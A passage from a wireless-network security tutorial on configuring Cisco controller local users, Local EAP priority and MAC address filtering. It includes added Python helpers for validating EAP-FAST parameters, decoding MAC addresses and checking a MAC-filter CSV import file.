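import re
import secrets

HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

# Limits quoted from the text above: server key in hex (0-9, A-F), PAC lifetime
# 1..1000 days, authority ID at most 32 hex characters.  The even-length rule for
# the authority ID is an ASSUMPTION (whole bytes), not something the text states.
PAC_TTL_MIN, PAC_TTL_MAX = 1, 1000
AUTHORITY_ID_MAX_HEX = 32


def validate_eap_fast_params(server_key, confirm_key, pac_ttl_days,
                             authority_id, authority_info):
    """Return a list of problems; an empty list means the values are acceptable."""
    problems = []
    if not HEX_RE.match(server_key):
        problems.append("server key must contain only hexadecimal digits 0-9 and A-F")
    if server_key != confirm_key:
        problems.append("server key and its confirmation do not match")
    if not PAC_TTL_MIN <= pac_ttl_days <= PAC_TTL_MAX:
        problems.append(f"PAC time to live must be between {PAC_TTL_MIN} and {PAC_TTL_MAX} days")
    if not HEX_RE.match(authority_id):
        problems.append("authority ID must be hexadecimal")
    elif len(authority_id) > AUTHORITY_ID_MAX_HEX:
        problems.append(f"authority ID must be at most {AUTHORITY_ID_MAX_HEX} hex characters")
    elif len(authority_id) % 2:
        problems.append("authority ID must have an even number of hex characters (whole bytes)")
    if not authority_info.strip():
        problems.append("authority ID information (text description) is empty")
    return problems


def authority_id_as_text(authority_id):
    """Read an authority ID as ASCII bytes; the screenshot's 436973636f spells 'Cisco'."""
    return bytes.fromhex(authority_id).decode("ascii", errors="replace")


def new_server_key(nbytes=16):
    """Generate a random server key in hex rather than a guessable one.
    16 random bytes give 32 hex characters (length is an assumption; check the page's limit)."""
    return secrets.token_hex(nbytes).upper()


if __name__ == "__main__":
    # Values from the screenshot, with a constructed server key (the real one is masked).
    print(validate_eap_fast_params("0123ABCD", "0123ABCD", 10, "436973636f", "Cisco A-ID"))
    print(authority_id_as_text("436973636f"))
    print(new_server_key())
```

The checks run client-side only; the controller applies its own input validation, so treat this as a pre-flight check on values you are about to paste in.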


65


[Screenshot: Security menu. AAA: General; RADIUS (Authentication, Accounting, Fallback); TACACS+; Local Net Users (selected); Disabled Clients; User Login Policies; AP Policies; Local EAP.]


Then go to Security > AAA > Local Net Users to add the users who will be authenticated locally.


[Screenshot: Security > AAA > Local Net Users. Items 0 to 0 of 0. Columns: User Name, WLAN Profile, Guest User, Role, Description.]


The list is still empty, so click New.


[Screenshot: Local Net Users > New. Fields: User Name (nader), Password, Confirm Password, Guest User, WLAN Profile, Description. Buttons: < Back, Apply.]



Fill in the user name and password, choose the WLAN profile and click Apply. After adding the users, the list shows them:


[Screenshot: Security > AAA > Local Net Users, Items 1 to 2 of 2. Row 1: nader, WLAN Profile Any WLAN, Guest User NO. Row 2: a second user, WLAN Profile Any WLAN, Guest User yes, Description guest only.]


Then go to Security > Local EAP > Authentication Priority to set the order between the local user list and LDAP, which in our case is a Microsoft Active Directory.


[Screenshot: Priority Order > Local-Auth. User Credentials list with LDAP and LOCAL and the Up / Down buttons. Help text depending on the order: with LDAP first, "Only LDAP is used"; with LOCAL first, "LDAP is used only if the local list does not contain the user".]
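To make the two rules concrete, here is a small Python model, added as an illustration (it is not controller code): it applies the two help texts from the page, "Only LDAP is used" when LDAP is first and "LDAP is used only if the local list does not contain the user" when LOCAL is first, to two constructed in-memory tables standing in for the Local Net Users list and the LDAP directory. The user names and passwords are made up for the demo.

```python
import hmac

# Constructed stand-ins for the controller's Local Net Users list and the LDAP directory.
LOCAL_NET_USERS = {"nader": "Local-Pass-1"}
LDAP_DIRECTORY = {"nader": "AD-Pass-2", "guest1": "Guest-Pass-3"}


def check(db, user, password):
    """True/False for a user the store knows; None when the store does not contain the user."""
    if user not in db:
        return None
    # Constant-time comparison, so the demo does not leak password length by timing.
    return hmac.compare_digest(db[user], password)


def authenticate(user, password, order):
    """order is ("LDAP", "LOCAL") or ("LOCAL", "LDAP"), as on the Priority Order page."""
    if order[0] == "LDAP":
        # "Only LDAP is used": the local list is never consulted.
        return bool(check(LDAP_DIRECTORY, user, password))
    verdict = check(LOCAL_NET_USERS, user, password)
    if verdict is None:
        # "LDAP is used only if the local list does not contain the user".
        return bool(check(LDAP_DIRECTORY, user, password))
    return verdict  # user present locally: the local verdict is final, right or wrong


if __name__ == "__main__":
    for order in (("LOCAL", "LDAP"), ("LDAP", "LOCAL")):
        for user, pw in (("nader", "Local-Pass-1"), ("nader", "AD-Pass-2"), ("guest1", "Guest-Pass-3")):
            print(order, user, authenticate(user, pw, order))
```

The second rule has a consequence worth knowing when LOCAL is first: a user who exists in the local list but types the Active Directory password is rejected, because the controller never falls through to LDAP for a user it already knows. Keep the local list limited to accounts that really should be authenticated locally.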


After that, open WLANs > Edit, then the Security tab and the AAA Servers sub-tab, tick Local EAP Authentication and select the EAP profile we created (users):


[Screenshot: WLANs > Edit, Security tab, AAA Servers sub-tab. Radius Servers: Authentication and Accounting, Server 1 to 3: None. Local EAP Authentication: Enabled; EAP Profile Name: users. Authentication priority order for webauth user: LDAP, LOCAL and RADIUS listed between Not Used and Order Used For Authentication, with Up / Down buttons. LDAP Servers: Server 1 to 3 Not Used. Buttons: < Back, Apply.]


MAC Address Filtering



[Screenshot: MAC Address Filter List on a small access point (Wireless Client MAC list; the D-Link example mentioned below). Enter MAC Address in this format: xxxxxxxxxxxx. MAC 01: 00-09-6F-57-01-62; MAC 02: 45-B9-31-B1-5C-22; MAC 03: 10-8A-41-2E-AD-75; the remaining entries are empty.]


The MAC address (Media Access Control address) is the unique address of the network card and belongs to the Data Link layer. It is made up of 12 hexadecimal digits (0-9 and A-F) and is written in one of these notations: 01-23-45-67-89-ab, 01:23:45:67:89:ab or 0123.4567.89ab. The address is divided into two halves, as the following figure shows:


[Figure: structure of a MAC address. Six bytes (1st to 6th octet). The first three bytes are the Organisationally Unique Identifier (OUI); the last three bytes are the Network Interface Controller (NIC) specific part. Bits b1 to b8 of the first octet: b1 = 0 unicast, 1 multicast; b2 = 0 globally unique (OUI enforced), 1 locally administered.]
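The following Python example is added here to put the figure into working code; it is not from the book. It accepts any of the three notations listed above, splits the address into the OUI and NIC-specific halves, decodes the two flag bits of the first octet, and compares addresses for a filter list regardless of the notation each side uses. The allow list is constructed from the two addresses visible on the access point screenshot above.

```python
import re


def normalize_mac(text):
    """Accept 01-23-45-67-89-ab, 01:23:45:67:89:ab or 0123.4567.89ab; return 12 lowercase hex digits."""
    digits = re.sub(r"[-:.]", "", text.strip()).lower()
    if not re.fullmatch(r"[0-9a-f]{12}", digits):
        raise ValueError(f"not a MAC address: {text!r}")
    return digits


def format_mac(digits, style):
    """Render 12 hex digits in one of the three notations used on the page."""
    if style == "hyphen":
        return "-".join(digits[i:i + 2] for i in range(0, 12, 2))
    if style == "colon":
        return ":".join(digits[i:i + 2] for i in range(0, 12, 2))
    if style == "dotted":
        return ".".join(digits[i:i + 4] for i in range(0, 12, 4))
    raise ValueError(f"unknown style {style!r}")


def decode_mac(text):
    """Split the address as in the figure: 3-byte OUI, 3-byte NIC part, and the two flag bits."""
    digits = normalize_mac(text)
    first_octet = int(digits[:2], 16)
    return {
        "oui": digits[:6],                                  # Organisationally Unique Identifier
        "nic": digits[6:],                                  # NIC-specific part
        "multicast": bool(first_octet & 0x01),              # b1: 0 = unicast, 1 = multicast
        "locally_administered": bool(first_octet & 0x02),   # b2: 0 = globally unique (OUI), 1 = set locally
    }


def is_permitted(candidate, allow_list):
    """MAC-filtering decision: pass only if the candidate is on the list, whatever notation either side uses."""
    allowed = {normalize_mac(a) for a in allow_list}
    return normalize_mac(candidate) in allowed


# Constructed allow list: the two addresses visible on the access point screenshot above.
ALLOW_LIST = ["00-09-6F-57-01-62", "45-B9-31-B1-5C-22"]

if __name__ == "__main__":
    for mac in ALLOW_LIST:
        print(format_mac(normalize_mac(mac), "dotted"), decode_mac(mac))
    print(is_permitted("0009.6f57.0162", ALLOW_LIST))
```

Decoding the flag bits is a cheap sanity check when entries are typed by hand: a client card's burned-in address always has b1 = 0 (unicast), yet the second address on the screenshot (first octet 0x45) has b1 = 1, so it could never belong to a real unicast client. An address with b2 = 1 was set in software rather than by the manufacturer, which is worth noticing when a filter list is supposed to identify physical hardware.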


The idea behind this protection is that every card has its own unique MAC address: the access point accepts the addresses we know and rejects any address that is not on its list. So before enabling MAC Address Filtering we must first collect the addresses of our devices, and there are several ways to do that. In wireless networks the WCS monitors rogue access points (Rogue APs), access points that are not under our management, and lists their MAC addresses:


[Screenshot: Wireless Control System, Monitor > Alarms (user root). Critical alarms for Rogue AP 00:15:c7:aa:72:ac (SSID 'guestne...'), 00:0b:85:5e:3b:e0 (SSID 'wlan12'), 00:0b:85:81:04:80 (SSID 'wlan41'), 00:16:9c:48:e6:7f, 00:16:9c:48:e6:7b, 00:16:9c:48:e6:7e, 00:0b:85:80:f6:c1 (SSID 'open11'), 00:16:9c:48:e6:7d, 00:15:c7:aa:72:ae, 00:15:c7:aa:72:ad and 00:0b:85:81:04:21 (SSID 'open42'), dated 4/11/08 at 9:03:18 AM and 9:12:53 AM. Columns: Severity, Failure Object, Owner, Date/Time, Message. Commands: Assign to me, Unassign, Delete, Clear, Acknowledge, Unacknowledge, Email Notification, Severity Configuration.]


The WCS maps also show the MAC address of every managed access point:


[Screenshot: Wireless Control System, Monitor > Maps > Cisco > Outdoor View (San Jose), with the map layers Access Points, AP Heatmaps, AP Mesh Info, Coverage Areas, Location Regions, Rails, Markers, Chokepoints and WiFi TDOA Receivers. AP Info panel for a mesh access point: MAC Address 00:0b:85:5f:fe:f0, AP Model, Controller, Location 3JC14-4, AP Height, AP Up Time, LWAPP Up Time, Run Ping Test. Note: data may be delayed up to 15 minutes or more depending on the background polling interval.]


For the client devices, the Advanced IP Scanner tool lists the IP address and the MAC address of every device in the network, and there are many similar tools. Once the addresses are known, we enter them in the MAC filtering page of the access point; the screenshot at the start of this section is from a small D-Link Access Point.



As you can see, this is easy on a single access point. But in large wireless networks, where one controller can manage up to 2500 access points, the addresses are managed centrally from the controller rather than on each access point.


The controller can use a RADIUS server to store these addresses, or keep them locally; here we store them locally on the Security > AAA > MAC Filtering page.


[Screenshot: Security > AAA > MAC Filtering. RADIUS Compatibility Mode: Cisco ACS. MAC Delimiter: No Delimiter (the choices are Colon, Hyphen, Single Hyphen and No Delimiter). MAC Filters > New: MAC Address (00:01:05:7?:1B:1D, partly unreadable), Profile Name, Description: Joe's laptop, Interface Name: management.]

Click New, then enter the MAC address of the device, a description, and the interface (management) that the device will be placed on:


[Screenshot: Security > AAA > MAC Filtering > MAC Filters > New. Fields: MAC Address, Profile Name (Any WLAN), Description, Interface Name (management). Buttons: < Back, Apply.]


Now we have a database of the permitted MAC addresses:


[Screenshot: Security > AAA > MAC Filtering, Local MAC Filters: four entries, each with MAC Address, Profile Name Any WLAN, Interface management, and Description. Buttons: Apply, New...]


Finally, MAC Filtering must be enabled on the WLAN itself, otherwise the list has no effect: open WLANs > Edit, the Security tab, then Layer 2, and tick MAC Filtering:


[Screenshot: WLANs > Edit, Security tab, Layer 2 sub-tab. Layer 2 Security drop-down (None, WPA+WPA2, 802.1X, Static WEP, Static WEP + 802.1X, CKIP) and the MAC Filtering checkbox.]


We can also use the WCS to import a file containing the MAC addresses into the controller:


[Screenshot: Wireless Control System, Configure > Controller Template Launch Pad > Security > MAC Filtering > New Controller Template. Import From File: File Path (Browse...), Override existing templates, Save. Left menu: System, WLANs, H-REAP, Security (File Encryption, RADIUS Auth Servers, RADIUS Acct Servers, RADIUS Fallback, LDAP Servers, TACACS+ Servers, Local EAP General, Local EAP Profiles, EAP-FAST Parameters, Network Users Priority, Local Net Users, Guest Users, User Login Policies, MAC Filtering, Access Point Authorization, Disabled Clients).]

The help text on that page shows the expected file format:

1. Sample csv file:

MAC Address,Profile Name,Interface,Description
12:22:22:22:22:22,profile5,management,cisco
00:00:00:00:00:01,profile,int1,First filter
00:00:00:00:00:02,,management,Second filter
00:00:00:00:00:03,,,Third filter

Note: "MAC Address" and "Description" are mandatory fields.


But remember that this method is not 100% secure, because MAC addresses can be imitated (spoofed) by anyone who learns an address that is on the list, and because in large networks the number of cards is so big that entering every address into the controller becomes impractical.
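As an added example (not the book's or Cisco's code), the Python script below validates a MAC-filter import file in the format of the sample above before it is uploaded through the WCS, enforcing the two mandatory fields, rejecting addresses that are not 12 hex digits, and catching duplicates that differ only in notation. It also renders an address under each of the four MAC Delimiter settings seen on the Security > AAA > MAC Filtering page, which matters when the list lives on a RADIUS server rather than locally. The sample file is constructed (the page's rows plus three deliberately bad ones), and the exact shapes of the four delimiter styles are my assumption from the option names; confirm them against your controller.

```python
import csv
import io
import re

# Constructed sample in the WCS import format shown above: the page's own rows,
# followed by three deliberately faulty rows (lines 5-7) to show what the checks report.
SAMPLE_CSV = """MAC Address,Profile Name,Interface,Description
00:00:00:00:00:01,profile,int1,First filter
00:00:00:00:00:02,,management,Second filter
00-00-00-00-00-03,,,Third filter
0000.0000.0001,,,Duplicate of the first row
00:00:00:00:00:04,,,
ZZ:00:00:00:00:05,,,Not hexadecimal
"""

MANDATORY = ("MAC Address", "Description")   # the note under the WCS sample file

# The four MAC Delimiter choices on the Security > AAA > MAC Filtering page.
# ASSUMPTION: these shapes are inferred from the option names, not taken from the book.
DELIMITER_STYLES = {
    "colon": lambda d: ":".join(d[i:i + 2] for i in range(0, 12, 2)),
    "hyphen": lambda d: "-".join(d[i:i + 2] for i in range(0, 12, 2)),
    "single hyphen": lambda d: d[:6] + "-" + d[6:],
    "no delimiter": lambda d: d,
}


def normalize_mac(text):
    """Strip the separators of any common notation and return 12 lowercase hex digits."""
    digits = re.sub(r"[-:.]", "", text.strip()).lower()
    if not re.fullmatch(r"[0-9a-f]{12}", digits):
        raise ValueError(f"not a MAC address: {text!r}")
    return digits


def render_mac(text, style):
    """Render an address the way the controller would present it under the chosen delimiter setting."""
    return DELIMITER_STYLES[style](normalize_mac(text))


def parse_mac_filter_csv(text):
    """Validate a WCS MAC-filter import file. Returns (accepted_rows, errors)."""
    reader = csv.DictReader(io.StringIO(text))
    rows, errors, seen = [], [], set()
    for lineno, row in enumerate(reader, start=2):          # line 1 is the header
        missing = [f for f in MANDATORY if not (row.get(f) or "").strip()]
        if missing:
            errors.append(f"line {lineno}: missing mandatory field(s) {', '.join(missing)}")
            continue
        try:
            digits = normalize_mac(row["MAC Address"])
        except ValueError as exc:
            errors.append(f"line {lineno}: {exc}")
            continue
        if digits in seen:                                    # same card written differently
            errors.append(f"line {lineno}: duplicate of an earlier address")
            continue
        seen.add(digits)
        rows.append({
            "mac": digits,
            "profile": (row.get("Profile Name") or "").strip(),
            "interface": (row.get("Interface") or "").strip(),
            "description": row["Description"].strip(),
        })
    return rows, errors


if __name__ == "__main__":
    accepted, problems = parse_mac_filter_csv(SAMPLE_CSV)
    print(f"{len(accepted)} accepted, {len(problems)} rejected")
    for p in problems:
        print(" ", p)
    for style in DELIMITER_STYLES:
        print(f"{style:14s}", render_mac("00:0b:85:5e:3b:e0", style))
```

Running the validation before the upload is the defender's version of the caveat above: the list is only as good as its entries, so a mistyped or duplicated address should be caught by a script rather than discovered when a legitimate client is refused.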